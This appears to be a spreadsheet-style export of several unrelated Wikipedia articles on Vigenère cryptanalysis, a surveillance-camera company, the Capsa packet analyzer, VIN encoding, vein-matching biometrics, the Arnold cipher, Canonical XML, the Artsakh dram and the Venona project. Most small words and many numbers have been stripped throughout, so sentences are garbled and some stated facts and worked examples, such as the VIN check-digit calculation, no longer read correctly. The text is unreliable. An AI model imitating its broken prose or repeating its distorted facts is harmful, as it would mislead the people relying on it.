polyalphabetic ciphers, disguise plaintext letter frequency interfere straightforward application frequency analysis. instance, frequent letter ciphertext whose plaintext english, might suspect corresponds since frequently used letter english. however, using vigenère cipher, enciphered different ciphertext letters different points message, defeats simple frequency analysis. primary weakness vigenère cipher repeating nature key. cryptanalyst correctly guesses key's length cipher text treated interleaved caesar ciphers, easily broken individually. length discovered brute force testing possible value kasiski examination friedman test help determine length (see below: kasiski examination friedman test). kasiski examination 1863, friedrich kasiski first publish successful general attack vigenère cipher. earlier attacks relied knowledge plaintext recognizable word key. kasiski's method dependencies. although kasiski first publish account attack, clear others aware 1854, charles babbage goaded breaking vigenère cipher john hall brock thwaites submitted "new" cipher journal society arts. when babbage showed thwaites' cipher essentially another recreation vigenère cipher, thwaites presented challenge babbage: given original text (from shakespeare's tempest scene enciphered version, find words thwaites used encipher original text. babbage soon found words: "two" "combined". babbage enciphered passage shakespeare using different words challenged thwaites find babbage's words. babbage never explained method used. studies babbage's notes reveal used method later published kasiski suggest using method early 1846.the kasiski examination, also called kasiski test, takes advantage fact repeated words are, chance, sometimes encrypted using letters, leading repeated groups ciphertext. example, consider following encryption using keyword abcd: key: abcdabcdabcdabcdabcdabcdabcd plaintext: cryptoisshortforcryptography ciphertext: csastpkvsiqutgqucsastpiuaqjb there easily noticed repetition ciphertext, kasiski test effective. distance repetitions csastp assumed repeated segments represent plaintext segments, implies characters long. (all factors distance possible lengths; length simple caesar cipher, cryptanalysis much easier.) since lengths unrealistically short, needs lengths longer messages make test accurate usually contain repeated ciphertext segments. following ciphertext segments repeated: ciphertext: vhvsspqucemrvbvbbbvhvsurqgibdugrnicjqucervuaxssr distance repetitions vhvs assumed repeated segments represent plaintext segments, implies character long. distance repetitions quce characters. that means length could character long. taking intersection sets, could safely conclude likely length since unrealistically short. friedman test friedman test (sometimes known kappa test) invented 1920s william friedman, used index coincidence, measures unevenness cipher letter frequencies break cipher. knowing probability {\displaystyle \kappa _{p}} randomly chosen source language letters (around 0.067 case-insensitive english) probability coincidence uniform random selection alphabet {\displaystyle \kappa _{r}} (1⁄26 0.0385 english), length estimated following: {\displaystyle {\frac {\kappa _{p}-\kappa _{r}}{\kappa _{o}-\kappa _{r}}}} observed coincidence rate {\displaystyle \kappa _{o}={\frac {\sum _{i=1}^{c}n_{i}(n_{i}-1)}{n(n-1)}}} size alphabet english), length text observed ciphertext letter frequencies, integers. that however, approximation; accuracy increases length text. would, practice, necessary various lengths close estimate. better approach repeating-key ciphers copy ciphertext rows matrix many columns assumed length compute average index coincidence column considered separately. when done possible length, highest average i.c. corresponds most-likely length. such tests supplemented information kasiski examination. frequency analysis once length known, ciphertext rewritten many columns, column corresponding single letter key. each column consists plaintext encrypted single caesar cipher. caesar (shift) letter vigenère used column. using methods similar used break caesar cipher, letters ciphertext discovered. improvement kasiski examination, known kerckhoffs' method, matches column's letter frequencies shifted plaintext frequencies discover letter (caesar shift) column. once every letter known, cryptanalyst decrypt ciphertext reveal plaintext. kerckhoffs' method applicable vigenère table scrambled, rather using normal alphabetic sequences, kasiski examination coincidence tests still used determine length. elimination vigenère cipher, normal alphabets, essentially uses modulo arithmetic, commutative. therefore, length known guessed), subtracting cipher text itself, offset length, produce plain text subtracted itself, also offset length. "probable word" plain text known guessed, self-subtraction recognized, allows recovery subtracting known plaintext cipher text. elimination especially useful short messages. example using lion below: then subtract ciphertext shift length lion. which nearly equivalent subtracting plaintext shift. which algebraically represented {\displaystyle i\in [1,n-m]} {\displaystyle {\begin{aligned}(c_{i}-c_{(i+m)}){\bmod {\ell }}&amp;=(e_{k}(m_{i})-e_{k}(m_{(i+m)})){\bmod {\ell }}\\&amp;=((m_{i}+k_{(i{\bmod {m}})}){\bmod {\ell }}-(m_{(i+m)}+k_{((i+m){\bmod {m}})}){\bmod {\ell }}){\bmod {\ell }}\\&amp;=((m_{i}+k_{(i{\bmod {m}})})-(m_{(i+m)}+k_{((i+m){\bmod {m}})})){\bmod {\ell }}\\&amp;=(m_{i}+k_{(i{\bmod {m}})}-m_{(i+m)}-k_{((i+m){\bmod {m}})}){\bmod {\ell }}\\&amp;=(m_{i}-m_{(i+m)}+k_{(i{\bmod {m}})}-k_{((i+m){\bmod {m}})}){\bmod {\ell }}\\&amp;=(m_{i}-m_{(i+m)}+k_{(i{\bmod {m}})}-k_{(i{\bmod {m}})}){\bmod {\ell }}\\&amp;=(m_{i}-m_{(i+m)}){\bmod {\ell }}\\\end{aligned}}} example, words brownfox known. this result omaz corresponds 12th letters result larger examples above. known section location verified. subtract brow range ciphertext. this produces final result, reveal lion. variants running running variant vigenère cipher also considered unbreakable time. key, version uses block text long plaintext. since long message, friedman kasiski tests longer work, repeated. multiple keys used, effective length least common multiple lengths individual keys. example, using keys cat, whose lengths obtains effective length (the least common multiple this understood point keys line encrypting twice, first encrypting produced encrypting other. this demonstrated encrypting attackatdawn iozqgh, produce ciphertext original example. lengths relatively prime, effective length grows exponentially individual lengths increased. example, effective length keys characters keys characters 1320. effective length longer ciphertext, achieves immunity friedman kasiski tests running variant. uses truly random, least long encrypted message, used once, vigenère cipher theoretically unbreakable. however, case, key, cipher, provides cryptographic strength, systems properly referred collectively one-time systems, irrespective ciphers employed. variant beaufort simple variant encrypt using vigenère decryption method decrypt using vigenère encryption. that method sometimes referred "variant beaufort". different beaufort cipher, created francis beaufort, similar vigenère uses slightly modified enciphering mechanism tableau. beaufort cipher reciprocal cipher. gronsfeld cipher despite vigenère cipher's apparent strength, never became widely used throughout europe. gronsfeld cipher variant created count gronsfeld (josse maximilaan gronsveld bronckhorst); identical vigenère cipher except uses different cipher alphabets, corresponding digits gronsfeld 0123 vigenere abcd. gronsfeld cipher strengthened word, weakened cipher alphabets. gronsfeld's cipher became widely used throughout germany europe, despite weaknesses. vigenèreʼs autokey cipher vigenère actually invented stronger cipher, autokey cipher. name "vigenère cipher" became associated simpler polyalphabetic cipher instead. fact, ciphers often confused, sometimes called chiffre indéchiffrable. babbage actually broke much-stronger autokey cipher, kasiski generally credited first published solution fixed-key polyalphabetic ciphers. also roger frontenac (nostradamus quatrain decryptor, 1950) simple vigenere cipher excel vba: provides code excel worksheet vigenere cipher encryption decryption. references citations sources beutelspacher, albrecht (1994). "chapter cryptology. translation german chris fisher. washington, mathematical association america. 27–41. isbn 0-883-85504-6. singh, simon (1999). "chapter chiffre indéchiffrable". code book. anchor book, random house. isbn 0-385-49532-3. helen gaines november 2014). cryptanalysis: study ciphers their solution. courier corporation. 117. isbn 978-0-486-80059-2. mendelsohn, charles (1940). "blaise vigenere 'chiffre carre'". proceedings american philosophical society. (2). notes external links articleshistory cipher cryptologia basic cryptanalysis h2g2 "lecture notes classical cryptology" including explanation derivation friedman test</t>
  </si>
  <si>
    <t>Arecont Vision</t>
  </si>
  <si>
    <t>arecont vision company based glendale, california, makes video surveillance products. mid-2018, went chapter bankruptcy acquired costar technologies. history arecont vision holdings, founded 2003 michael kaplinsky vladimir berezin southern california. costar acquisition original company acquired costar technologies, inc. (otc markets: csti), texas-based manufacturer video surveillance machine vision products, following reorganization chapter bankruptcy proceedings. purchase price reported $11.25 million cash. original company closed, arecont vision costar, launched july 2018 operating division costar. aftermath costar acquisition, percent arecont's workforce made redundant early 2019. references</t>
  </si>
  <si>
    <t>Capsa (software)</t>
  </si>
  <si>
    <t>capsa name family packet analyzer developed colasoft network administrators monitor, troubleshoot analyze wired wireless networks. currently, three editions available: capsa enterprise edition, capsa standard edition, capsa free edition. advance features captures packets single multiple network adapters analyzes header contents packet provides statistics address analyze protocol (data link application layer) diagnoses kinds network problems presents statistics graphs alerts computer network anomalies outputs packets logs files logs dns, browsing, email, services capsa enterprise edition capsa enterprise edition flagship colasoft capsa packet analyzer family, supports ethernet wlan networks. performs real-time packet capturing analysis well supporting past-events analysis. marketed tool enterprise network administrator help deal daily network work, various kinds network problem maintain productive enterprise network. capsa standard edition capsa standard edition ethernet packet analyzer designed networking professionals small business network administrators. marketed network tool network monitoring, troubleshooting analyzing purposes. capsa free edition capsa free edition freeware ethernet packet analyzer designed colasoft personal use. marketed tool network geeks learn protocols, packets, networking related knowledge, free charge personal family users' network monitoring troubleshooting needs. anyone download capsa free edition colasoft website legal noncommercial use. comparison editions source: references external links colasoft official website colasoft official blog colasoft capsa vanove, rick (july 2009). "test-drive: colasoft capsa network analyzer". techrepublic. retrieved february 2022. merrill, scott (august 2009). "review: colasoft capsa network analyzer". techcrunch. retrieved february 2022. harac, (december 2009). "capsa keeps tabs your network". world. retrieved february 2022. dragone, michael (june 2010). "review: colasoft capsa 7.1". itpro today. retrieved february 2022. "colasoft capsa v7.2.1 network analyser review". firewall.cx. retrieved february 2022. williams, david (july 2010). "review colasoft capsa network analyser". itwire. retrieved february 2022. harac, (september 2010). "capsa free gives skinny your network-for free". world. retrieved february 2022. williams, david (april 2011). "review: colasoft capsa wifi". itwire. retrieved february 2022. "software review: colasoft capsa enterprise network analyzer". firewall.cx. retrieved february 2022. parker, jeff (february 2022). best free netflow analyzers collectors windows linux". network downloads. retrieved february 2022. lists colasoft capsa free edition ahmed, waqas (may 2014). "capsa comprehensive network analysis tool wlan". addictivetips. retrieved february 2022. nair, (may 2015). "colasoft capsa enterprise". pcquest. retrieved february 2022.</t>
  </si>
  <si>
    <t>Vehicle identification number</t>
  </si>
  <si>
    <t>vehicle identification number (vin) (also called chassis number frame number) unique code, including serial number, used automotive industry identify individual motor vehicles, towed vehicles, motorcycles, scooters mopeds, defined international organization standardization 3779 (content structure) 4030 (location attachment).vins first used 1954 united states. from 1954 1981, accepted standard numbers, different manufacturers used different formats. 1954, request government, manufacturers automobile manufacturers association involved creation new, standardized vehicle identification numbering system named vehicle identification number (vin) agreed upon digit sequence concealed chassis markings vin.in 1981, national highway traffic safety administration united states standardized format. required on-road vehicles sold contain 17-character vin, include letters (o), (i), avoid confusion numerals there vehicle history services several countries help potential owners vins find vehicles defective written off. classification there least four competing standards used calculate vin. fmvss 115, part 565: used united states canada 3779: used europe many parts world j853: very similar standard 61/2 used australia, referring 3779 3780 components modern vins based related standards, originally issued international organization standardization (iso) 1979 1980: 3779 3780, respectively. compatible different implementations standards adopted european union united states.the comprises following sections: world manufacturer identifier first three characters uniquely identify manufacturer vehicle using world manufacturer identifier code. manufacturer builds fewer 1,000 vehicles year uses third digit, 12th, 13th 14th position second part identification. some manufacturers third character code vehicle category (e.g., truck), division within manufacturer, both. example, within (assigned general motors united states), represents chevrolet passenger cars; 1g2, pontiac passenger cars; 1gc, chevrolet trucks. society automotive engineers (sae) assigns wmis countries manufacturers.the first character typically region manufacturer located although exceptions e.g. assigned tesla inc. united states 2021. practice, assigned country manufacture, although europe country continental headquarters located assign vehicles produced region (example: opel/vauxhall cars whether produced germany, spain, united kingdom poland carry adam opel based rüsselsheim, germany). notation below, assume letters precede numbers zero last number. example, 8x–82 denotes range excluding country region codes vehicle descriptor section fourth ninth positions vehicle descriptor section vds. this used, according local regulations, identify vehicle type, include information automobile platform used, model, body style. each manufacturer unique system using field. most manufacturers since 1980s used eighth digit identify engine type whenever engine choice vehicle. example: 2007 chevrolet corvette, 6.0-liter engine, 7.0-liter north american check digits element inconsistent position nine check digit, compulsory vehicles north america china, europe. vehicle identifier section 10th 17th positions used vehicle identifier section vis. this used manufacturer identify individual vehicle question. this include information options installed engine transmission choices, often simple sequential number. north america, last five digits must numeric. model year encoding consistent element 10th digit, required worldwide encode model year vehicle. besides three letters allowed letters digit used model year code. year code model year vehicle. year 1980 encoded manufacturers, especially general motors chrysler, (since 17-digit mandatory 1981, zero manufacturer's pre-1981 placement vin), ford still used zero 1980. subsequent years increment allowed letters, represents year 2000. 2001 2009 encoded digits subsequent years encoded "a", "b", "c", etc. april 2008, national highway traffic safety administration adopted final rule amending part 565, current character vehicle identification number (vin) system, place almost years, continue least another years", process making several changes requirements applicable motor vehicles manufactured sale united states. there three notable changes structure affect deciphering systems: make identified looking positions three another position, determined manufacturer second section fourth eighth segment vin. order identify exact year passenger cars multipurpose passenger vehicles gvwr 10,000 less, must read position well position passenger cars, multipurpose passenger vehicles trucks gross vehicle weight rating 10,000 (4,500 less, position seven numeric, model year position refers year range 1980–2009. position seven alphabetic, model year position refers year range 2010–2039. model year vehicles gvwr greater 10,000 (4,500 kg), well buses, motorcycles, trailers low-speed vehicles, longer identified within 30-year range. characters assigned 1980 2009 repeated beginning 2010 model year. plant code compulsory north america china 11th character identify assembly plant vehicle built. each manufacturer plant codes. production number united states china, 12th 17th digits vehicle's serial production number. this unique vehicle, every manufacturer uses sequence. check-digit calculation check-digit validation used road vehicles sold united states canada. when trying validate check digit, first either remove check digit purpose calculation weight zero (see below) cancel out. original value check digit compared calculated value. calculated value 0–9, check digit must match calculated value. calculated value check digit must values match (and error calculation), mistake vin. however, match prove correct, still 1/11 chance distinct vins matching check digit: example, valid vins 5gzcz43d13s812715 (correct leading five) sgzcz43d13s812715 (incorrect leading character "s"). vins porsche image, wp0zzz99zts392124, gm-t body image, klatf08y1vb363636, pass north american check-digit verification. transliterating numbers transliteration consists removing letters, replacing appropriate numerical counterparts. these numerical alternatives (based ibm's ebcdic) following chart. allowed valid vin; chart, filled (not applicable). numerical digits values. there left-alignment linearity. weights used calculation following weight factor position vin. position check digit. substituted cancel multiplication step. worked example consider hypothetical 1m8gdm9a_kp042788, underscore check digit. vin's value calculated transliteration table. this number used rest calculation. copy weights weight factor above. products result multiplication columns value weight rows. products added together yield sum, 351. find remainder dividing 11351 10351 3110⁄11 remainder check digit. remainder check digit example, remainder check digit transliterated x.with check digit 1m8gdm9a_kp042788 written 1m8gdm9axkp042788. straight-ones (seventeen consecutive nice feature check digit matches calculated value this value multiplied (sum weights) divided remainder 1⁄11; thus check digit. this test vin-check algorithm. scanning marked multiple locations; normally lower corner windshield driver's side, bonnet next latch, front vehicle frame, inside door pillar driver's side. newer vehicles vins optically read barcode scanners digital cameras, digitally read obd-ii. there smartphone applications pass websites decode vin. list common society automotive engineers (sae) assigns (world manufacturer identifier) countries manufacturers. following list shows selection world manufacturer codes. note: vehicles registered australia without character also builder's plate danish bicycle vin-system engine number name plate serial number etching code cloning references external links 3779:2009 fmvss 115, part</t>
  </si>
  <si>
    <t>Vein matching</t>
  </si>
  <si>
    <t>vein matching, also called vascular technology, technique biometric identification analysis patterns blood vessels visible surface skin. though used federal bureau investigation central intelligence agency, method identification still development universally adopted crime labs considered reliable established techniques, fingerprinting. however, used conjunction existing forensic data support conclusion.while types biometric scanners widely employed security systems, vascular scanners growing popularity. fingerprint scanners frequently used, generally provide enough data points critical verification decisions. since fingerprint scanners require direct contact finger scanner, abraded skin interfere reliability system. skin diseases, psoriasis, also limit accuracy scanner, mention direct contact scanner result need frequent cleaning higher risk equipment damage. hand, vascular scanners require contact scanner, since information read inside body, skin conditions affect accuracy reading. vascular scanners also work quickly, scanning less second. scan, capture unique pattern formed veins branch hand. retinal scanner reliable vascular scanner, less widely used intrusive nature. people generally uncomfortable exposing eyes unfamiliar source light, retinal scanners difficult install vascular scanning equipment, since variations angle height face relation device must accounted for. history rice, automation controls engineer kodak's annesley factory, invented vein pattern recognition early 1980s response bank cards identity stolen. developed essentially barcode reader human body assigned rights uk's nrdc (national research development corporation). nrdc/ (thatcher privatised nrdc btg) made little headway licensing vein pattern technology. world wedded fingerprints iris patterns governments (the main buyers biometric solutions) wanted open view biometrics surveillance purposes, hidden, personal biometric solution. late 1990s said dropping vein patterns commercial interest. rice unhappy btg's decision implementation vein pattern technology gave talk biometric summit washington would develop vein pattern recognition. this view countered following speaker (the based international biometric group) said insufficient information content vein patterns used viable biometric. 2002 hitachi fujitsu launched vein biometric products veins turned consistent, discriminatory accurate biometric traits. 2000s, rice received invitation matthias vanoni partner swiss company, biowatch develop commercialise biowatch. see: https://sites.google.com/site/veinpatternhome/ commercial applications vascular/vein pattern recognition (vpr) technology developed commercially hitachi since 1997, infrared light absorbed hemoglobin subject's blood vessels recorded dark patterns) camera behind transparent surface. data patterns processed, compressed, digitized future biometric authentication subject. computer security expert bruce schneier stated advantage vein patterns biometric identification lack known method forging usable "dummy", possible fingerprints.blood vessel patterns unique individual, biometric data fingerprint recognition patterns iris. unlike biometric systems, blood vessel patterns almost impossible counterfeit located beneath skin's surface. biometric systems based fingerprints fooled dummy finger fitted copied fingerprint; voice facial characteristic-based systems fooled recordings high-resolution images. finger vein identification system much harder fool authenticate finger living person. finger vein recognition finger vein recognition based images human finger vein patterns beneath skin's surface. technology currently development wide variety applications, including credit card authentication, automobile security, employee time attendance tracking, computer network authentication, point security automated teller machines. obtain pattern database record, individual inserts finger attester terminal containing near-infrared light-emitting diode (led) light monochrome charge-coupled device (ccd) camera. hemoglobin blood absorbs near-infrared light, makes vein system appear dark pattern lines. camera records image data digitized, certified, sent database registered images. authentication purposes, finger scanned data sent database registered images comparison. authentication process takes less seconds.finger scanning devices deployed japanese financial institutions, kiosks, turnstiles. mantra softech marketed device india scans vein patterns palms attendance recording. fujitsu developed version require direct physical contact vein scanner improved hygiene electronic point sale devices.lambert sonna momo developed 2020 generation scanner, venoscannerf, scans finger veins multiple views extracts encrypted constantly changing random code. developing floating-hand version available market 2022. forensic identification according 31,000-word investigative report published january 2011 georgetown university faculty students, u.s. federal investigators used photos video recording beheading american journalist daniel pearl match veins visible areas perpetrator captured al-qaeda operative khalid sheikh mohammed, notably "bulging vein" running across hand. used matching technique mohammed 2004 2007. officials concerned confession, obtained torture (namely waterboarding), would hold court used vein matching evidence bolster case. other applications some hospitals, langone medical center, vein matching system called imprivata patientsecure, primarily reduce errors. additional benefits include identifying unconscious uncommunicative patients, saving time paperwork. bernard birnbaum, chief hospital operations langone, says "vein patterns times unique fingerprints". however, news reports vein matching pearl's murderer quote experts "that reliability forensic identification tool unproven. also vein verification references further reading external links finger-vein image recognition combining modified hausdorff distance minutiae feature matching free library truth left behind: inside kidnapping murder daniel pearl center public integrity</t>
  </si>
  <si>
    <t>Arnold Cipher</t>
  </si>
  <si>
    <t>arnold cipher book cipher used john andré benedict arnold negotiations arnold's failed attempt surrender west point british 1780. background 1779, continental army major general benedict arnold initiated became series communications british army major john andré, adjutant chief lieutenant general henry clinton, commander-in-chief british forces north america. communications, first mediated joseph stansbury, philadelphia merchant, arnold offered services british. andré responded offer letter dated 1779, described types services arnold might provide, described code obscure communications.the book used cipher either commentaries laws england william blackstone nathan bailey's dictionary. cipher consisted series three numbers separated periods. these numbers represented page number agreed book, line number page, word number line. arnold added missing letters suffixes could find match books. example, 120.9.7 would refer 120th page, line page, seventh word line, which, following example decoded "general". actual communications often disguised embedding letter written arnold's wife peggy, cipher would written invisible ink, might also disguised appeared routine business communications. coded example this code generated arnold message andré dated july 1780: 120.9.7, w------- 105.9.5's .22.9.14.---- 163.8.19 f----- 172.8.7s 56.9.8 |30.000| 172.8.70 11.94. 62.8.20. 179.8.25, 84.8.9'd, 177.9.28. n---- 111.9.27.'d 23.8.10. 111.9.13, 180.9.19 180.8.21 .179.8.25., 255.8.17. that, 180.9.19, 44.8.9—a—is 234.8.14 189.8.17. 44.8.9, 145.8.17, 294.9.12, 266.8.17 well 103.8.11, 184.9.15.---- 80.4.20. ---- i149.8.7, 10.8.22'd 57.9.71 288.9.9, 198.9.26, 100.4.18 189.8.19—i 221.8.6 173.8.19, 102.8.26, 236.8.21's--- 289.8.17 175.9.7, 87.8.7--- 166.8.11, .191.9.16 .129.19.21 266.9.14 .286.8.20, 291.8.27 ---163.9.4 115.8.16 .114.8.25ing 263.9.14. 207.8.17ed, 125.8.15, 103.8.60--- 294.8.50, 104.9.26—if 84.8.9ed—294.9.12, 129.8.7. 193.8.3 64.9.5, 290.9.20, 245.8.3 99.8.14 .204.8.2, 253.8.7s 159.8.10 187.8.11 94.9.9ing 164.8.24, 279.8.16, .238.8.25, 93.9.28. decoded example here jonathan odell, andré's assistant, decoded message: general w[ashington]--- expects arrival f[rench]--- troops collect 30,000 troops conjunction; disappointed, n[ew]. york fixed first object, numbers sufficient object, can-a- second; inform time, well every design. accepted command w[est]. p[oint]. post render essential services, disposal. mass people heartily tired war, wish former footing they promised great events year's exertion—if disappointed persevere contest soon end. present struggles like pangs dying man, violent short duration--- references "secret methods techniques". clements library, university michigan. archived original 2010-06-11. retrieved 2010-03-12. "july 1780 benedict arnold john andré (code)". clements library, university michigan. archived original june 2010. retrieved 2010-03-12. "july 1780 benedict arnold john andré (decoded)". clements library, university michigan. archived original june 2010. retrieved 2010-03-12. "andré stansbury, 1779". clements library, university michigan. archived original june 2010. retrieved 2010-03-12.</t>
  </si>
  <si>
    <t>Canonical XML</t>
  </si>
  <si>
    <t>canonical normal form xml, intended allow relatively simple comparison pairs documents equivalence; purpose, canonical transformation removes non-meaningful differences documents. document converted canonical xml. example, permits whitespace occur various points within start-tags, attributes specified order. such differences seldom ever used convey meaning, forms generally considered equivalent: class="a" secure="1"&gt; secure class='a' converting arbitrary document canonical xml, attributes encoded normative order (alphabetical name), normative spacing quoting (though namespace declarations placed ahead regular attributes, namespaced attributes sorted namespace rather prefix qualified name). thus, second form would converted first. canonical specifies number details, are: utf-8 encoding used line-ends represented using newline character 0x0a whitespace attribute values normalized entity references non-special character references expanded cdata sections replaced character content empty elements encoded start/end pairs, using special empty-element syntax default attributes made explicit superfluous namespace declarations deletedaccording w3c, documents canonical form, documents logically equivalent within given application context (except limitations regarding unusual cases). however, special context users might care special semantics beyond generic logical equivalence canonical associated. example, steganography system could conceal information document varying whitespace, attribute quoting order, hexadecimal decimal numeric character references, obviously converting file canonical would lose specialized semantics. hand, files differ upper- lower-case, archaic versus modern spelling, might considered equivalent certain purposes. such contexts beyond scope canonical xml. also signature external links recommendation, canonical version 1.0, march 2001 recommendation, exclusive canonicalization version 1.0, july 2002</t>
  </si>
  <si>
    <t>Artsakh dram</t>
  </si>
  <si>
    <t>artsakh dram (armenian: արցախյան դրամ) monetary unit facto independent republic artsakh. although legal tender, widely used armenian dram. coins commemorative coins issued 2003, seven different coins also issued, dated 2004. they aluminum luma coins featuring horse leaping antelope, three aluminum dram coins featuring wildcat, pheasant gregory illuminator, aluminum-bronze dram coins featuring ghazanchetsots cathedral town shusha mountains monument right outside stepanakert, aluminum 1000 dram coins featuring lake kevork chavush. series coins issued 2013, consists luma coins featuring horse antelope, three dram coins depicting leopard, wolf pheasant five dram coins showing bear capricorn. banknotes dram banknotes issued, bearing date 2004 printed österreichische staatsdruckerei (austria state printing house). also armenian dram artsakhbank economy republic artsakh list currencies list circulating currencies list currencies europe references</t>
  </si>
  <si>
    <t>Venona project</t>
  </si>
  <si>
    <t>venona project united states counterintelligence program initiated world united states army's signal intelligence service (later absorbed national security agency), february 1943, october 1980. intended decrypt messages transmitted intelligence agencies soviet union (e.g. nkvd, kgb, gru). initiated soviet union ally program continued cold war, considered enemy. during 37-year duration venona project, signal intelligence service decrypted translated approximately 3,000 messages. signals intelligence yield included discovery cambridge five espionage ring united kingdom soviet espionage manhattan project u.s. (known project enormous). some espionage undertaken support soviet atomic bomb project. venona project remained secret years concluded. some decoded soviet messages declassified published united states 1995. background during world early years cold war, venona project source information soviet intelligence-gathering directed western military powers. although unknown public, even presidents franklin roosevelt harry truman, programs importance concerning crucial events early cold war. these included julius ethel rosenberg spying case (which based events world defections donald maclean burgess soviet union. most decipherable messages transmitted intercepted 1942 1945, world soviet union ally sometime 1945, existence venona program revealed soviet union cryptologist-analyst bill weisband, nkvd agent u.s. army's sigint. these messages slowly gradually decrypted beginning 1946. this effort continued (many times level effort latter years) 1980, venona program terminated. analyst effort assigned moved important projects. extent various individuals referred messages involved soviet intelligence topic historical dispute. while number academics historians assert individuals mentioned venona decrypts likely either clandestine assets and/or contacts soviet intelligence agents, others argue many people probably malicious intentions committed crimes. commencement venona project initiated february 1943, gene grabeel, american mathematician cryptanalyst, orders colonel carter clarke, chief special branch military intelligence service time. clarke distrusted joseph stalin, feared soviet union would sign separate peace nazi germany, allowing germany focus military forces united kingdom united states. cryptanalysts u.s. army's signal intelligence service arlington hall analyzed encrypted high-level soviet diplomatic intelligence messages intercepted large volumes immediately world american, british, australian listening posts. decryption this message traffic, encrypted one-time system, stored analyzed relative secrecy hundreds cryptanalysts 40-year period starting early 1940s. when used correctly, one-time encryption system, used most-secret military diplomatic communication since 1930s, unbreakable. however, serious blunder part soviets, traffic vulnerable cryptanalysis. soviet company manufactured one-time pads produced around 35,000 pages duplicate numbers, result pressures brought german advance moscow world duplication—which undermines security one-time system—was discovered, attempts lessen impact made sending duplicates widely separated users. despite this, reuse detected cryptanalysts breakthrough soviet systems general used code convert words letters numbers, additive keys (from one-time pads) added, encrypting content. when used correctly plaintext length equal less random key, one-time encryption unbreakable. however, cryptanalysis american code-breakers revealed one-time material incorrectly reused soviets (specifically, entire pages, although complete books), allowed decryption (sometimes partial) small part traffic. generating one-time pads slow labor-intensive process, outbreak germany june 1941 caused sudden increase need coded messages. probable soviet code generators started duplicating cipher pages order keep demand. arlington hall's lieutenant richard hallock, working soviet "trade" traffic called messages dealt soviet trade issues), first discovered soviets reusing pages. hallock colleagues, amongst genevieve feinstein, cecil phillips, frank lewis, frank wanat, lucille campbell, went break significant amount trade traffic, recovering many one-time additive tables process. young meredith gardner used material break turned nkvd (and later gru) traffic reconstructing code used convert text numbers. gardner credits marie meyer, linguist signal intelligence service making initial recoveries venona codebook. samuel chew cecil phillips also made valuable contributions. december 1946, gardner made first break code, revealing existence soviet espionage manhattan project. venona messages also indicated soviet spies worked washington state department, treasury, office strategic services, even white house. very slowly, using assorted techniques ranging traffic analysis defector information, messages decrypted. claims made information physical recovery code books partially burned obtained finns) bugging embassy rooms text entered encrypting devices (analyzing keystrokes listening punched contributed recovering much plaintext. these latter claims less fully supported open literature. significant (mentioned nsa) early stages work done cooperation japanese finnish cryptanalysis organizations; americans broke japanese codes world gained access information. there also reports copies signals purloined soviet offices federal bureau investigation (fbi) helpful cryptanalysis. finnish radio intelligence sold much material concerning soviet codes 1944 operation stella polaris, including partially burned code book. results reported (according serial numbers venona cables) thousands cables sent, fraction available cryptanalysts. approximately 2,200 messages decrypted translated; half 1943 gru-naval washington moscow messages broken, none year, although several thousand sent 1941 1945. decryption rate nkvd cables follows: 1942 1.8% 1943 15.0% 1944 49.0% 1945 1.5%out hundreds thousands intercepted encrypted texts, claimed 3,000 partially wholly decrypted. duplicate one-time pages produced 1942, almost used 1945, used late 1948. after this, soviet message traffic reverted completely unreadable.the existence venona decryption became known soviets within years first breaks. clear whether soviets knew much message traffic messages successfully decrypted. least soviet penetration agent, british secret intelligence service representative u.s. philby, told project 1949, part liaison british u.s. intelligence. since duplicate one-time pages used time, soviets apparently make changes cryptographic procedures learned venona. however, information allowed alert agents might risk exposure decryption. significance decrypted messages gave important insights soviet behavior period duplicate one-time pads used. with first break code, venona revealed existence soviet espionage alamos national laboratories. identities soon emerged american, canadian, australian, british spies service soviet government, including klaus fuchs, alan nunn may, donald maclean. others worked washington state department, treasury, office strategic services, even white house. messages show u.s. nations targeted major espionage campaigns soviet union early 1942. among identified julius ethel rosenberg; alger hiss; harry dexter white, second-highest official treasury department; lauchlin currie, personal aide franklin roosevelt; maurice halperin, section head office strategic services. identification individuals mentioned venona transcripts sometimes problematic, since people "covert relationship" soviet intelligence referenced cryptonyms. further complicating matters fact person sometimes different cryptonyms different times, cryptonym sometimes reused different individuals. cases, notably hiss, matching venona cryptonym individual disputed. many cases, venona cryptonym linked person. according authors john earl haynes harvey klehr, venona transcripts identify approximately americans claim covert relationship soviet intelligence, though fewer half matched real-name identities. however, every agent communicating directly soviet intelligence. each persons many others working for, reporting them. office strategic services, predecessor cia, housed time another fifteen twenty soviet spies. duncan lee, donald wheeler, jane foster zlatowski, maurice halperin passed information moscow. production board, board economic warfare, office coordinator inter-american affairs office information, included least half dozen soviet sources among employees. bearing venona particular cases venona added information—some unequivocal, ambiguous—to several espionage cases. some known spies, including theodore hall, neither prosecuted publicly implicated, venona evidence withheld. identity soviet source cryptonymed "19" remains unclear. according british writer nigel west, "19" edvard beneš, president czechoslovak government-in-exile. military historian eduard mark american authors herbert romerstein eric breindel concluded roosevelt's aide harry hopkins. according american authors john earl haynes harvey klehr, "19" could someone british delegation washington conference 1943. moreover, argue evidence hopkins agent found archives, partial message relating "19" indicate source spy.however, vasili mitrokhin archivist defected united kingdom 1992 copies large numbers files. claimed harry hopkins secret russian agent. moreover, oleg gordievsky, high-level officer also defected soviet union, reported iskhak akhmerov, officer controlled clandestine soviet agents u.s. war, said hopkins "the important soviet wartime agents united states".alexander vassiliev's notes identified source code-named "19" laurence duggan. julius ethel rosenberg venona added significant information case julius ethel rosenberg, making clear julius guilty espionage, also showing ethel, acting principal, still acted accessory, took part julius's espionage activity played role recruitment brother atomic espionage.venona recent information shown, content julius' atomic espionage vital soviets alleged time espionage activities, fields extensive. information rosenberg passed soviets concerned proximity fuze, design production information lockheed p-80 fighter, thousands classified reports emerson radio. venona evidence indicates unidentified sources code-named "quantum" "pers" facilitated transfer nuclear weapons technology soviet union positions within manhattan project. according alexander vassiliev's notes archive, "quantum" boris podolsky "pers" russell mcnutt, engineer uranium processing plant ridge. klaus fuchs venona decryptions also important exposure atomic klaus fuchs. some earliest messages decrypted concerned information scientist manhattan project, referred code names charles rest. message moscow york, dated april 1945, called information provided charles great value." noting information included "data atomic mass nuclear explosive" "details explosive method actuating" atomic bomb, message requested technical details charles. investigations based venona decryptions eventually identified charles rest fuchs 1949. alger hiss harry dexter white according moynihan commission government secrecy, complicity alger hiss harry dexter white conclusively proven venona, stating "the complicity alger hiss state department seems settled. harry dexter white treasury department." 1998 book, united states senator daniel patrick moynihan expressed certainty hiss's identification venona soviet spy, writing "hiss indeed soviet agent appears regarded moscow important."several current authors, researchers, archivists consider venona evidence hiss inconclusive. donald maclean burgess philby access files, 